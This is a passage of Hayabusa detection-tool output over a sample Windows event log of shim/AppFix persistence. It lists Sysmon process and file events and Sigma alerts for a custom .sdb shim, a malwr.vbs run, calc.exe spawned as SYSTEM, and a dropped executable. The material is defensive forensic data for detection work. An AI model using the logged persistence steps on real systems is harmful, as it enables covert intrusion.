PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:18:57.202 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:20:32.298 +00:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_sysmon/registry_set/registry_set_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:20:32.298 +00:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,rules/sigma/registry_sysmon/registry_set/registry_set_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:21:05.306 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:22:28.886 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:22:33.593 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:26:05.397 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:26:08.852 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:31:05.509 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:36:05.610 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:05.702 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:11.440 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:17.339 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:17.339 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:18.290 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 21:41:18.410 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:49.576 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:49.856 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.157 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.217 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.217 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.387 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.427 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.467 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:50.497 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:51.308 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:51.599 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:51.679 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:51.789 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.111 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.501 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.571 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.922 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:53.922 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.102 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.172 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.172 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.172 +00:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.172 +00:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.182 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.182 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.593 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.603 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.603 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.623 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.623 +00:00,PC01.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.783 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.793 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:54.813 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 365ABB72-77C4-5C91-0000-0010EA870100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.224 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.224 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.404 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.404 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.514 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.514 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.544 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.544 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.594 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.594 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.654 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 23:18:55.654 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: 